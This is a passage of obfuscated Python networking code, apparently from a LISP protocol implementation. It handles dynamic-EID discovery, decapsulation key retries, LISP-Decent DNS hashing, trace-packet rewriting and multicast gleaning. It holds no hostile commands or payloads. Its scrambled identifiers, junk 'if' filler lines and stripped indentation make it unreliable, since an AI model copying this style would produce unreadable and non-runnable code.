if 87 - 87: IiII - Ii1I / Oo0Ooo / I1ii11iIi11i . iII111i
if 49 - 49: IiII * OoooooooOO * iIii1I11I1II1 * Oo0Ooo / iII111i % oO0o
if 88 - 88: I1Ii111 * OOooOOo
jdata = mc . source_cache . walk_cache ( lisp_ipc_map_cache_entry , jdata )
return ( [ True , jdata ] )
if 38 - 38: Oo0Ooo - OoooooooOO - OoooooooOO / II111iiii
if 10 - 10: II111iiii - OoO0O00 / II111iiii % Ii1I - OoOoOO00
if 90 - 90: I11i + II111iiii - oO0o - ooOoO0o / ooOoO0o / i11iIiiIii
if 80 - 80: I1ii11iIi11i % O0 / II111iiii + iII111i
if 22 - 22: Oo0Ooo + ooOoO0o . OOooOOo % Oo0Ooo . IiII
if 34 - 34: Ii1I . OoOoOO00 - OOooOOo * Oo0Ooo - ooOoO0o . oO0o
if 42 - 42: O0 + OoO0O00
def lisp_itr_discover_eid ( db , eid , input_interface , routed_interface ,
lisp_ipc_listen_socket ) :
iIiI1I1ii1I1 = eid . print_address ( )
if ( iIiI1I1ii1I1 in db . dynamic_eids ) :
db . dynamic_eids [ iIiI1I1ii1I1 ] . last_packet = lisp_get_timestamp ( )
return
if 47 - 47: O0 % OoOoOO00 + Ii1I * iIii1I11I1II1
if 55 - 55: Ii1I
if 93 - 93: iII111i + OOooOOo . OoooooooOO . I1Ii111 . O0
if 46 - 46: i11iIiiIii
if 26 - 26: I11i * Oo0Ooo % OoO0O00 + Oo0Ooo - I1ii11iIi11i
iiI1IiI1I1I = lisp_dynamic_eid ( )
iiI1IiI1I1I . dynamic_eid . copy_address ( eid )
iiI1IiI1I1I . interface = routed_interface
iiI1IiI1I1I . last_packet = lisp_get_timestamp ( )
iiI1IiI1I1I . get_timeout ( routed_interface )
db . dynamic_eids [ iIiI1I1ii1I1 ] = iiI1IiI1I1I
if 74 - 74: i1IIi + OoO0O00 . II111iiii + I1Ii111
O0iIiiiIiI1IIII = ""
if ( input_interface != routed_interface ) :
O0iIiiiIiI1IIII = ", routed-interface " + routed_interface
if 27 - 27: OoOoOO00 + OoooooooOO - iII111i + I11i + OoOoOO00
if 25 - 25: Ii1I / II111iiii + o0oOOo0O0Ooo . I1ii11iIi11i
i11Ii = green ( iIiI1I1ii1I1 , False ) + bold ( " discovered" , False )
lprint ( "Dynamic-EID {} on interface {}{}, timeout {}" . format ( i11Ii , input_interface , O0iIiiiIiI1IIII , iiI1IiI1I1I . timeout ) )
if 21 - 21: o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: i11iIiiIii % I1ii11iIi11i
if 73 - 73: OoOoOO00 + O0 + I1IiiI . iIii1I11I1II1 / I1ii11iIi11i
if 98 - 98: Oo0Ooo
if 72 - 72: oO0o + OoooooooOO . O0 + IiII
ii1I11Iii = "learn%{}%{}" . format ( iIiI1I1ii1I1 , routed_interface )
ii1I11Iii = lisp_command_ipc ( ii1I11Iii , "lisp-itr" )
lisp_ipc ( ii1I11Iii , lisp_ipc_listen_socket , "lisp-etr" )
return
if 49 - 49: i1IIi - i11iIiiIii + II111iiii + Ii1I / OoO0O00
if 34 - 34: I1ii11iIi11i * i11iIiiIii
if 6 - 6: I1ii11iIi11i + I1IiiI / OoooooooOO % I11i * Oo0Ooo
if 20 - 20: Oo0Ooo
if 85 - 85: I1Ii111
if 98 - 98: OoO0O00 - IiII % iIii1I11I1II1 . OoOoOO00 + i1IIi + OoooooooOO
if 29 - 29: I1ii11iIi11i * I1Ii111 - i1IIi * i11iIiiIii * iIii1I11I1II1 % I11i
if 73 - 73: OoO0O00 . I1IiiI / o0oOOo0O0Ooo
if 12 - 12: I11i * i11iIiiIii - O0 * o0oOOo0O0Ooo - IiII + I1IiiI
if 7 - 7: oO0o + I1Ii111 . o0oOOo0O0Ooo / IiII + iIii1I11I1II1 % I1Ii111
if 24 - 24: i11iIiiIii + iIii1I11I1II1
if 22 - 22: i11iIiiIii . II111iiii / o0oOOo0O0Ooo / Ii1I . O0 . OoOoOO00
if 89 - 89: O0 * Oo0Ooo + I1Ii111 + ooOoO0o * OoOoOO00
def lisp_retry_decap_keys ( addr_str , packet , iv , packet_icv ) :
if ( lisp_search_decap_keys == False ) : return
if 20 - 20: OoO0O00 - OoOoOO00
if 84 - 84: iIii1I11I1II1 + ooOoO0o . o0oOOo0O0Ooo % iII111i
if 35 - 35: I11i - oO0o * oO0o / OoooooooOO + iII111i + OoOoOO00
if 48 - 48: I1Ii111 / o0oOOo0O0Ooo - OOooOOo / o0oOOo0O0Ooo % O0
if ( addr_str . find ( ":" ) != - 1 ) : return
if 38 - 38: OoO0O00 + o0oOOo0O0Ooo / OoO0O00
O0O0oO00 = lisp_crypto_keys_by_rloc_decap [ addr_str ]
if 74 - 74: oO0o - i1IIi . Oo0Ooo / I1IiiI + o0oOOo0O0Ooo . OoOoOO00
for III11II111 in lisp_crypto_keys_by_rloc_decap :
if 35 - 35: iII111i / Ii1I
if 57 - 57: ooOoO0o . I1IiiI * OOooOOo
if 87 - 87: I11i - I11i % iII111i - Ii1I
if 29 - 29: oO0o - ooOoO0o * iIii1I11I1II1 / OoOoOO00
if ( III11II111 . find ( addr_str ) == - 1 ) : continue
if 34 - 34: I1IiiI . Oo0Ooo
if 4 - 4: Ii1I - II111iiii * iII111i / oO0o - I1IiiI
if 32 - 32: iIii1I11I1II1 - I11i
if 49 - 49: I11i * I1Ii111 - iIii1I11I1II1 * O0
if ( III11II111 == addr_str ) : continue
if 72 - 72: I1IiiI * iII111i
if 61 - 61: Ii1I * Oo0Ooo * I1Ii111 % I11i + iII111i % oO0o
if 67 - 67: IiII
if 90 - 90: o0oOOo0O0Ooo
iIiiI11II11i = lisp_crypto_keys_by_rloc_decap [ III11II111 ]
if ( iIiiI11II11i == O0O0oO00 ) : continue
if 5 - 5: i1IIi
if 55 - 55: Ii1I
if 46 - 46: OOooOOo / iII111i . i1IIi . i11iIiiIii . iIii1I11I1II1 % I11i
if 62 - 62: I11i % II111iiii % OoooooooOO * ooOoO0o / oO0o
iIii = iIiiI11II11i [ 1 ]
if ( packet_icv != iIii . do_icv ( packet , iv ) ) :
lprint ( "Test ICV with key {} failed" . format ( red ( III11II111 , False ) ) )
continue
if 41 - 41: Oo0Ooo + Ii1I
if 79 - 79: IiII
lprint ( "Changing decap crypto key to {}" . format ( red ( III11II111 , False ) ) )
lisp_crypto_keys_by_rloc_decap [ addr_str ] = iIiiI11II11i
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
return
if 49 - 49: O0
if 72 - 72: I1Ii111
if 96 - 96: II111iiii / OOooOOo % i1IIi / Oo0Ooo
if 22 - 22: I1IiiI % iIii1I11I1II1 % I1ii11iIi11i
if 68 - 68: iII111i + I11i
if 61 - 61: oO0o . I1Ii111
if 74 - 74: O0 . Ii1I - iII111i % IiII + II111iiii
if 71 - 71: oO0o + Ii1I % oO0o
def lisp_decent_pull_xtr_configured ( ) :
return ( lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None )
if 17 - 17: I1Ii111 % I1Ii111 * o0oOOo0O0Ooo
if 84 - 84: I1Ii111 + iII111i . i1IIi / O0 / I1Ii111 + o0oOOo0O0Ooo
if 70 - 70: O0 % ooOoO0o - iII111i + oO0o
if 12 - 12: I1Ii111 - OoO0O00 % II111iiii % ooOoO0o / II111iiii % OoOoOO00
if 74 - 74: iII111i . OOooOOo * Ii1I / Oo0Ooo . OoO0O00 . I11i
if 65 - 65: i11iIiiIii - OoO0O00 / OoooooooOO * I1IiiI % iII111i
if 15 - 15: OOooOOo * Ii1I / ooOoO0o
if 70 - 70: i11iIiiIii * oO0o . I11i - OoooooooOO / I1ii11iIi11i
def lisp_is_decent_dns_suffix ( dns_name ) :
if ( lisp_decent_dns_suffix == None ) : return ( False )
ooO0o = dns_name . split ( "." )
ooO0o = "." . join ( ooO0o [ 1 : : ] )
return ( ooO0o == lisp_decent_dns_suffix )
if 10 - 10: IiII * OoOoOO00 . II111iiii . II111iiii * Oo0Ooo
if 23 - 23: I1ii11iIi11i + I11i
if 74 - 74: i1IIi % I1IiiI
if 44 - 44: Oo0Ooo - OoooooooOO % ooOoO0o + II111iiii
if 60 - 60: o0oOOo0O0Ooo - ooOoO0o + i11iIiiIii % I1ii11iIi11i % II111iiii
if 62 - 62: Ii1I
if 30 - 30: iII111i % O0 + II111iiii * I1IiiI
if 91 - 91: i11iIiiIii
if 35 - 35: OoOoOO00 * I1Ii111 / Oo0Ooo - i1IIi - IiII + OOooOOo
if 96 - 96: Oo0Ooo + I1ii11iIi11i . O0
if 62 - 62: i1IIi % OoooooooOO % OoooooooOO
def lisp_get_decent_index ( eid ) :
iIiI1I1ii1I1 = eid . print_prefix ( )
ooOo0000OO0O = hmac . new ( b"lisp-decent" , iIiI1I1ii1I1 , hashlib . sha256 ) . hexdigest ( )
if 6 - 6: Ii1I - i1IIi
if 43 - 43: OoO0O00 + I1ii11iIi11i * iII111i % i11iIiiIii
if 55 - 55: IiII
if 6 - 6: IiII % iIii1I11I1II1 + I1IiiI - II111iiii + O0
iI1i = os . getenv ( "LISP_DECENT_HASH_WIDTH" )
if ( iI1i in [ "" , None ] ) :
iI1i = 12
else :
iI1i = int ( iI1i )
if ( iI1i > 32 ) :
iI1i = 12
else :
iI1i *= 2
if 89 - 89: O0 % IiII . Oo0Ooo % Ii1I - I11i
if 43 - 43: iIii1I11I1II1 % I11i + i1IIi + I1Ii111
if 99 - 99: iII111i
iIIi = ooOo0000OO0O [ 0 : iI1i ]
OOOooo0OooOoO = int ( iIIi , 16 ) % lisp_decent_modulus
if 28 - 28: iIii1I11I1II1 * ooOoO0o
lprint ( "LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}" . format ( lisp_decent_modulus , old_div ( iI1i , 2 ) , iIIi , OOOooo0OooOoO ) )
if 25 - 25: iII111i . I1IiiI
if 61 - 61: Oo0Ooo * OOooOOo
return ( OOOooo0OooOoO )
if 42 - 42: I1Ii111 / O0 . oO0o
if 78 - 78: OoO0O00 * Ii1I / I1Ii111 - ooOoO0o
if 61 - 61: o0oOOo0O0Ooo * iIii1I11I1II1
if 4 - 4: i11iIiiIii / IiII . I1Ii111 / II111iiii . OoO0O00
if 14 - 14: I11i / ooOoO0o + i1IIi
if 64 - 64: I11i / OOooOOo + I1IiiI
if 60 - 60: I1IiiI * oO0o % OoO0O00 . i1IIi
def lisp_get_decent_dns_name ( eid ) :
OOOooo0OooOoO = lisp_get_decent_index ( eid )
return ( str ( OOOooo0OooOoO ) + "." + lisp_decent_dns_suffix )
if 84 - 84: Oo0Ooo + OoOoOO00 / OoooooooOO
if 32 - 32: iIii1I11I1II1 / i1IIi % Oo0Ooo + Ii1I . i11iIiiIii
if 31 - 31: oO0o / O0 - II111iiii * I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo * I11i * II111iiii
if 39 - 39: IiII % i1IIi % OoooooooOO - O0
if 39 - 39: i11iIiiIii / Ii1I / ooOoO0o
if 93 - 93: o0oOOo0O0Ooo - Oo0Ooo / oO0o / OoOoOO00
if 75 - 75: o0oOOo0O0Ooo * ooOoO0o % Ii1I
def lisp_get_decent_dns_name_from_str ( iid , eid_str ) :
I11I = lisp_address ( LISP_AFI_NONE , eid_str , 0 , iid )
OOOooo0OooOoO = lisp_get_decent_index ( I11I )
return ( str ( OOOooo0OooOoO ) + "." + lisp_decent_dns_suffix )
if 94 - 94: OoooooooOO + II111iiii / iIii1I11I1II1 * ooOoO0o
if 85 - 85: ooOoO0o / IiII
if 28 - 28: i11iIiiIii - OoOoOO00
if 13 - 13: O0
if 82 - 82: OoooooooOO
if 59 - 59: I1Ii111 + I1ii11iIi11i + OoO0O00 % oO0o . i1IIi % O0
if 22 - 22: i1IIi * OoOoOO00 + Ii1I
if 48 - 48: Ii1I % IiII + OoO0O00 . IiII
if 42 - 42: Ii1I
if 70 - 70: I11i
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
rloc_entry = None ) :
if 82 - 82: O0
IiI1ii1Ii = 28 if packet . inner_version == 4 else 48
OooO0oOOooo = packet . packet [ IiI1ii1Ii : : ]
O00Oo00ooO = lisp_trace ( )
if ( O00Oo00ooO . decode ( OooO0oOOooo ) == False ) :
lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
return ( False )
if 10 - 10: OOooOOo + oO0o % ooOoO0o
if 76 - 76: i1IIi + O0
iiOooo0oOO0 = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
if 23 - 23: OoooooooOO % OoO0O00 . i11iIiiIii * i11iIiiIii * OoOoOO00
if 84 - 84: OOooOOo % I1Ii111 + I11i / I1IiiI . iII111i
if 78 - 78: oO0o . Oo0Ooo
if 18 - 18: IiII
if 35 - 35: OoooooooOO / i1IIi - OoO0O00 + Oo0Ooo - o0oOOo0O0Ooo
if 100 - 100: II111iiii % i11iIiiIii % oO0o + O0
if ( iiOooo0oOO0 != "?" and packet . encap_port != LISP_DATA_PORT ) :
if ( ed == "encap" ) : iiOooo0oOO0 += ":{}" . format ( packet . encap_port )
if 46 - 46: OoO0O00 / I1IiiI - Oo0Ooo . o0oOOo0O0Ooo . Oo0Ooo % I11i
if 43 - 43: IiII - O0 + I1Ii111 % OoooooooOO % OoO0O00 / I1Ii111
if 48 - 48: I1ii11iIi11i . i1IIi % i1IIi - iII111i * o0oOOo0O0Ooo + IiII
if 45 - 45: II111iiii . II111iiii + I1IiiI / I1Ii111 . OoO0O00 - o0oOOo0O0Ooo
if 20 - 20: ooOoO0o % oO0o
iIiiI11II11i = { }
iIiiI11II11i [ "n" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
if 28 - 28: i1IIi . II111iiii + O0 / O0 % OoOoOO00 + OOooOOo
iiIiII1 = packet . outer_source
if ( iiIiII1 . is_null ( ) ) : iiIiII1 = lisp_myrlocs [ 0 ]
iIiiI11II11i [ "sr" ] = iiIiII1 . print_address_no_iid ( )
if 69 - 69: OoO0O00 * I1IiiI + I1IiiI . iII111i . II111iiii
if 60 - 60: OoOoOO00
if 71 - 71: O0 * OOooOOo . I1IiiI . I1Ii111 * I11i
if 45 - 45: O0 . O0 . II111iiii * ooOoO0o
if 2 - 2: OoO0O00 . o0oOOo0O0Ooo
if ( iIiiI11II11i [ "n" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
iIiiI11II11i [ "sr" ] += ":{}" . format ( packet . inner_sport )
if 48 - 48: Ii1I
if 45 - 45: I1ii11iIi11i - I11i + Ii1I
iIiiI11II11i [ "hn" ] = lisp_hostname
III11II111 = ed [ 0 ] + "ts"
iIiiI11II11i [ III11II111 ] = lisp_get_timestamp ( )
if 82 - 82: iII111i
if 81 - 81: i1IIi % OOooOOo - OoO0O00 - Oo0Ooo
if 19 - 19: i1IIi
if 97 - 97: OoO0O00 + i11iIiiIii % I1IiiI * Ii1I
if 89 - 89: IiII % i11iIiiIii + OoO0O00 . oO0o / I1IiiI . Ii1I
if 11 - 11: ooOoO0o - I1Ii111 - I11i + OoOoOO00
if ( iiOooo0oOO0 == "?" and iIiiI11II11i [ "n" ] == "ETR" ) :
II1II1Iii1I = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( II1II1Iii1I != None and len ( II1II1Iii1I . rloc_set ) >= 1 ) :
iiOooo0oOO0 = II1II1Iii1I . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 20 - 20: I11i + O0
if 27 - 27: Oo0Ooo
iIiiI11II11i [ "dr" ] = iiOooo0oOO0
if 12 - 12: I1ii11iIi11i . iII111i - iII111i - OOooOOo - iIii1I11I1II1
if 50 - 50: I1IiiI - iIii1I11I1II1 . iII111i - Ii1I / I1Ii111 + iII111i
if 46 - 46: OOooOOo + iII111i % Oo0Ooo * iII111i % OoooooooOO * IiII
if 27 - 27: I1IiiI + I1IiiI + I1ii11iIi11i - oO0o * OOooOOo
if ( iiOooo0oOO0 == "?" and reason != None ) :
iIiiI11II11i [ "dr" ] += " ({})" . format ( reason )
if 53 - 53: I1ii11iIi11i / OoooooooOO * iIii1I11I1II1
if 4 - 4: I1IiiI . iIii1I11I1II1 + OOooOOo / IiII . o0oOOo0O0Ooo . I11i
if 52 - 52: ooOoO0o % i11iIiiIii . IiII + OoO0O00
if 66 - 66: II111iiii . Ii1I
if 42 - 42: iIii1I11I1II1 * iII111i * I1IiiI
if ( rloc_entry != None ) :
iIiiI11II11i [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
iIiiI11II11i [ "hops" ] = rloc_entry . recent_rloc_probe_hops
iIiiI11II11i [ "lats" ] = rloc_entry . recent_rloc_probe_latencies
if 66 - 66: Oo0Ooo * i1IIi / I1ii11iIi11i / OoO0O00
if 12 - 12: OOooOOo + iIii1I11I1II1 % I1Ii111 + OOooOOo
if 19 - 19: OoO0O00 / I1IiiI - o0oOOo0O0Ooo - i1IIi + I1ii11iIi11i * OoooooooOO
if 74 - 74: I1Ii111 . I11i / Oo0Ooo
if 88 - 88: oO0o % OoO0O00 - i11iIiiIii % I1Ii111 / O0 * IiII
if 99 - 99: o0oOOo0O0Ooo . ooOoO0o / i11iIiiIii
OoiIii11i11i = packet . inner_source . print_address ( )
O0OooOoOo00oo = packet . inner_dest . print_address ( )
if ( O00Oo00ooO . packet_json == [ ] ) :
O0oI1I1IiIII1i = { }
O0oI1I1IiIII1i [ "se" ] = OoiIii11i11i
O0oI1I1IiIII1i [ "de" ] = O0OooOoOo00oo
O0oI1I1IiIII1i [ "paths" ] = [ ]
O00Oo00ooO . packet_json . append ( O0oI1I1IiIII1i )
if 44 - 44: IiII + OOooOOo % OoO0O00 . OoooooooOO * O0
if 72 - 72: i1IIi - iII111i * I1IiiI % O0 - I11i * O0
if 78 - 78: I1IiiI - OoO0O00 / Ii1I . i1IIi
if 30 - 30: IiII
if 21 - 21: i1IIi . iII111i - I1IiiI
if 28 - 28: IiII / Ii1I - i1IIi - OoOoOO00
for O0oI1I1IiIII1i in O00Oo00ooO . packet_json :
if ( O0oI1I1IiIII1i [ "de" ] != O0OooOoOo00oo ) : continue
O0oI1I1IiIII1i [ "paths" ] . append ( iIiiI11II11i )
break
if 65 - 65: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo
if 77 - 77: OoooooooOO - Oo0Ooo - OoOoOO00 / I11i / O0 . i11iIiiIii
if 27 - 27: I1Ii111 * O0
if 9 - 9: i1IIi - Oo0Ooo - i11iIiiIii / iIii1I11I1II1 . i1IIi
if 2 - 2: I11i + II111iiii - I11i / oO0o / I11i
if 73 - 73: IiII % I1Ii111 . OoOoOO00
if 96 - 96: I1IiiI / ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I . I11i
OO00 = False
if ( len ( O00Oo00ooO . packet_json ) == 1 and iIiiI11II11i [ "n" ] == "ETR" and
O00Oo00ooO . myeid ( packet . inner_dest ) ) :
O0oI1I1IiIII1i = { }
O0oI1I1IiIII1i [ "se" ] = O0OooOoOo00oo
O0oI1I1IiIII1i [ "de" ] = OoiIii11i11i
O0oI1I1IiIII1i [ "paths" ] = [ ]
O00Oo00ooO . packet_json . append ( O0oI1I1IiIII1i )
OO00 = True
if 42 - 42: I1ii11iIi11i . I1ii11iIi11i % Oo0Ooo * oO0o
if 80 - 80: o0oOOo0O0Ooo + OOooOOo . II111iiii + i11iIiiIii
if 45 - 45: iIii1I11I1II1 / o0oOOo0O0Ooo * OoooooooOO - Oo0Ooo
if 77 - 77: II111iiii
if 8 - 8: I1IiiI * II111iiii % I1ii11iIi11i
if 88 - 88: Oo0Ooo . oO0o + OoOoOO00 % OoooooooOO
O00Oo00ooO . print_trace ( )
OooO0oOOooo = O00Oo00ooO . encode ( )
if 81 - 81: OoooooooOO . I1Ii111 + OoO0O00 % I1Ii111
if 49 - 49: oO0o . oO0o % oO0o / Oo0Ooo
if 62 - 62: ooOoO0o . i1IIi % OoO0O00 - I1ii11iIi11i - IiII
if 57 - 57: i1IIi - II111iiii - O0 . iII111i + OoO0O00
if 67 - 67: OOooOOo * iII111i / iIii1I11I1II1 / I1ii11iIi11i
if 10 - 10: OoooooooOO % I1ii11iIi11i * i1IIi . iII111i
if 96 - 96: II111iiii % i11iIiiIii - Oo0Ooo
if 70 - 70: O0 * iIii1I11I1II1 - IiII * I11i / Ii1I + i11iIiiIii
Ii11i1I1 = O00Oo00ooO . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "sr" ]
if ( iiOooo0oOO0 == "?" ) :
lprint ( "LISP-Trace return to sender RLOC {}" . format ( Ii11i1I1 ) )
O00Oo00ooO . return_to_sender ( lisp_socket , Ii11i1I1 , OooO0oOOooo )
return ( False )
if 36 - 36: Ii1I * oO0o / oO0o % I1IiiI % I1IiiI + I1IiiI
if 41 - 41: OoooooooOO . O0 % OOooOOo
if 88 - 88: O0
if 44 - 44: II111iiii - IiII / I1IiiI + ooOoO0o % iII111i - iII111i
if 53 - 53: OoooooooOO
if 41 - 41: i1IIi - oO0o
OooooOo = O00Oo00ooO . packet_length ( )
if 41 - 41: I11i
if 92 - 92: i11iIiiIii
if 62 - 62: i1IIi / I1IiiI - o0oOOo0O0Ooo
if 3 - 3: O0 * OoOoOO00 * I11i / OoOoOO00
if 77 - 77: i1IIi
if 3 - 3: iII111i * OoO0O00 - oO0o + iII111i . o0oOOo0O0Ooo + I1IiiI
ooO0oii = packet . packet [ 0 : IiI1ii1Ii ]
o00oo = struct . pack ( "HH" , socket . htons ( OooooOo ) , 0 )
ooO0oii = ooO0oii [ 0 : IiI1ii1Ii - 4 ] + o00oo
if ( packet . inner_version == 6 and iIiiI11II11i [ "n" ] == "ETR" and
len ( O00Oo00ooO . packet_json ) == 2 ) :
Ii1iiI1 = ooO0oii [ IiI1ii1Ii - 8 : : ] + OooO0oOOooo
Ii1iiI1 = lisp_udp_checksum ( OoiIii11i11i , O0OooOoOo00oo , Ii1iiI1 )
ooO0oii = ooO0oii [ 0 : IiI1ii1Ii - 8 ] + Ii1iiI1 [ 0 : 8 ]
if 35 - 35: OoOoOO00
if 61 - 61: I1Ii111
if 78 - 78: I1Ii111 * Ii1I % Ii1I + I1IiiI
if 83 - 83: iIii1I11I1II1 + O0 / IiII . iIii1I11I1II1
if 74 - 74: Oo0Ooo
if 60 - 60: OoooooooOO
if 16 - 16: iIii1I11I1II1 - OoOoOO00 / I1ii11iIi11i % O0 % o0oOOo0O0Ooo
if 99 - 99: ooOoO0o . o0oOOo0O0Ooo - O0 * I1Ii111 . i11iIiiIii / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 + oO0o / iIii1I11I1II1 - i1IIi % OoO0O00
if ( OO00 ) :
if ( packet . inner_version == 4 ) :
ooO0oii = ooO0oii [ 0 : 12 ] + ooO0oii [ 16 : 20 ] + ooO0oii [ 12 : 16 ] + ooO0oii [ 22 : 24 ] + ooO0oii [ 20 : 22 ] + ooO0oii [ 24 : : ]
if 22 - 22: OOooOOo
else :
ooO0oii = ooO0oii [ 0 : 8 ] + ooO0oii [ 24 : 40 ] + ooO0oii [ 8 : 24 ] + ooO0oii [ 42 : 44 ] + ooO0oii [ 40 : 42 ] + ooO0oii [ 44 : : ]
if 65 - 65: i1IIi - oO0o . I1Ii111 . ooOoO0o % I1ii11iIi11i % I1ii11iIi11i
if 1 - 1: I1Ii111 + I1Ii111
iiIi = packet . inner_dest
packet . inner_dest = packet . inner_source
packet . inner_source = iiIi
if 96 - 96: iII111i + OoOoOO00 - o0oOOo0O0Ooo + Ii1I
if 6 - 6: O0 . I11i
if 22 - 22: Oo0Ooo . O0 / i1IIi - OoOoOO00
if 41 - 41: II111iiii - I1ii11iIi11i - I1Ii111
if 82 - 82: I1IiiI * I1IiiI / iIii1I11I1II1
if 14 - 14: I11i + Ii1I - OOooOOo % Ii1I / Ii1I
if 86 - 86: I1Ii111 - i11iIiiIii + Ii1I + I11i
IiI1ii1Ii = 2 if packet . inner_version == 4 else 4
oo0oooOO0oO = 20 + OooooOo if packet . inner_version == 4 else OooooOo
o000oooOOO0OO = struct . pack ( "H" , socket . htons ( oo0oooOO0oO ) )
ooO0oii = ooO0oii [ 0 : IiI1ii1Ii ] + o000oooOOO0OO + ooO0oii [ IiI1ii1Ii + 2 : : ]
if 12 - 12: I1IiiI / OoO0O00 + Oo0Ooo
if 29 - 29: I1IiiI / i1IIi . I1ii11iIi11i / ooOoO0o - Oo0Ooo * oO0o
if 29 - 29: I11i . OoO0O00 - OoooooooOO
if 64 - 64: IiII + O0
if ( packet . inner_version == 4 ) :
I1 = struct . pack ( "H" , 0 )
ooO0oii = ooO0oii [ 0 : 10 ] + I1 + ooO0oii [ 12 : : ]
o000oooOOO0OO = lisp_ip_checksum ( ooO0oii [ 0 : 20 ] )
ooO0oii = o000oooOOO0OO + ooO0oii [ 20 : : ]
if 62 - 62: O0 . I11i * oO0o
if 88 - 88: iII111i * iII111i - ooOoO0o + OoO0O00 . iII111i
if 44 - 44: I11i / I1Ii111
if 77 - 77: oO0o * OoOoOO00 * O0 % IiII
if 45 - 45: OoOoOO00
packet . packet = ooO0oii + OooO0oOOooo
return ( True )
if 66 - 66: I11i
if 10 - 10: i11iIiiIii - O0 / iII111i * i11iIiiIii * OoooooooOO - oO0o
if 70 - 70: i1IIi / IiII + II111iiii - I1ii11iIi11i . OoooooooOO - i1IIi
if 34 - 34: OoOoOO00 + iII111i - I11i . IiII
if 79 - 79: ooOoO0o - II111iiii + I1IiiI - o0oOOo0O0Ooo . Ii1I
if 16 - 16: o0oOOo0O0Ooo . i1IIi * ooOoO0o / OoOoOO00 % i11iIiiIii
if 57 - 57: IiII
if 89 - 89: I1ii11iIi11i - I1Ii111 + o0oOOo0O0Ooo
if 62 - 62: I1ii11iIi11i + OoooooooOO * OOooOOo
if 49 - 49: i1IIi - I11i * II111iiii
def lisp_allow_gleaning ( eid , group , rloc ) :
if ( lisp_glean_mappings == [ ] ) : return ( False , False , False )
if 4 - 4: o0oOOo0O0Ooo + o0oOOo0O0Ooo
for iIiiI11II11i in lisp_glean_mappings :
if ( "instance-id" in iIiiI11II11i ) :
i1oO00O = eid . instance_id
I1iO00O , i1iiI11 = iIiiI11II11i [ "instance-id" ]
if ( i1oO00O < I1iO00O or i1oO00O > i1iiI11 ) : continue
if 57 - 57: I1IiiI * OOooOOo . i11iIiiIii * oO0o - OoOoOO00
if ( "eid-prefix" in iIiiI11II11i ) :
I1i = copy . deepcopy ( iIiiI11II11i [ "eid-prefix" ] )
I1i . instance_id = eid . instance_id
if ( eid . is_more_specific ( I1i ) == False ) : continue
if 35 - 35: O0
if ( "group-prefix" in iIiiI11II11i ) :
if ( group == None ) : continue
o0O0Ooo = copy . deepcopy ( iIiiI11II11i [ "group-prefix" ] )
o0O0Ooo . instance_id = group . instance_id
if ( group . is_more_specific ( o0O0Ooo ) == False ) : continue
if 65 - 65: Oo0Ooo
if ( "rloc-prefix" in iIiiI11II11i ) :
if ( rloc != None and rloc . is_more_specific ( iIiiI11II11i [ "rloc-prefix" ] )
== False ) : continue
if 100 - 100: I1Ii111 . o0oOOo0O0Ooo * OoooooooOO . o0oOOo0O0Ooo
return ( True , iIiiI11II11i [ "rloc-probe" ] , iIiiI11II11i [ "igmp-query" ] )
if 90 - 90: i11iIiiIii . I1IiiI + ooOoO0o * OoooooooOO * OoooooooOO + oO0o
return ( False , False , False )
if 77 - 77: OOooOOo * OoOoOO00
if 75 - 75: Oo0Ooo * Oo0Ooo - IiII - OoOoOO00 / i11iIiiIii + I1Ii111
if 57 - 57: i11iIiiIii / oO0o
if 37 - 37: o0oOOo0O0Ooo + OoOoOO00 - i1IIi . Oo0Ooo
if 3 - 3: ooOoO0o % OoooooooOO / I1Ii111 + oO0o - O0
if 72 - 72: oO0o * OoO0O00
if 89 - 89: OoooooooOO . OOooOOo
def lisp_build_gleaned_multicast ( seid , geid , rloc , port , igmp ) :
iiiii1I1III1 = geid . print_address ( )
OOoOOo0 = seid . print_address_no_iid ( )
I1iiIi111I = green ( "{}" . format ( OOoOOo0 ) , False )
I1i = green ( "(*, {})" . format ( iiiii1I1III1 ) , False )
I1I1iIiiiiII11 = red ( rloc . print_address_no_iid ( ) + ":" + str ( port ) , False )
if 51 - 51: OOooOOo . OOooOOo . I1IiiI
if 90 - 90: I1Ii111
if 88 - 88: I1IiiI % Oo0Ooo
if 31 - 31: Oo0Ooo % Oo0Ooo . o0oOOo0O0Ooo * Oo0Ooo
I11 = lisp_map_cache_lookup ( seid , geid )
if ( I11 == None ) :
I11 = lisp_mapping ( "" , "" , [ ] )
I11 . group . copy_address ( geid )
I11 . eid . copy_address ( geid )
I11 . eid . address = 0
I11 . eid . mask_len = 0
I11 . mapping_source . copy_address ( rloc )
I11 . map_cache_ttl = LISP_IGMP_TTL
I11 . gleaned = True
I11 . add_cache ( )
lprint ( "Add gleaned EID {} to map-cache" . format ( I1i ) )
if 63 - 63: IiII / oO0o % I1IiiI / Ii1I * I1ii11iIi11i % iII111i
if 72 - 72: i1IIi * iIii1I11I1II1 . IiII - iIii1I11I1II1
if 79 - 79: Ii1I / i11iIiiIii . I1Ii111
if 43 - 43: iII111i + iII111i * O0
if 28 - 28: II111iiii * iII111i - o0oOOo0O0Ooo
if 42 - 42: iII111i - iII111i
iII = o0o0oooooo0O = IIIi11i1 = None
if ( I11 . rloc_set != [ ] ) :
iII = I11 . rloc_set [ 0 ]
if ( iII . rle ) :
o0o0oooooo0O = iII . rle
for ooO0Oo0o0OO in o0o0oooooo0O . rle_nodes :
if ( ooO0Oo0o0OO . rloc_name != OOoOOo0 ) : continue
IIIi11i1 = ooO0Oo0o0OO
break
if 42 - 42: II111iiii . O0
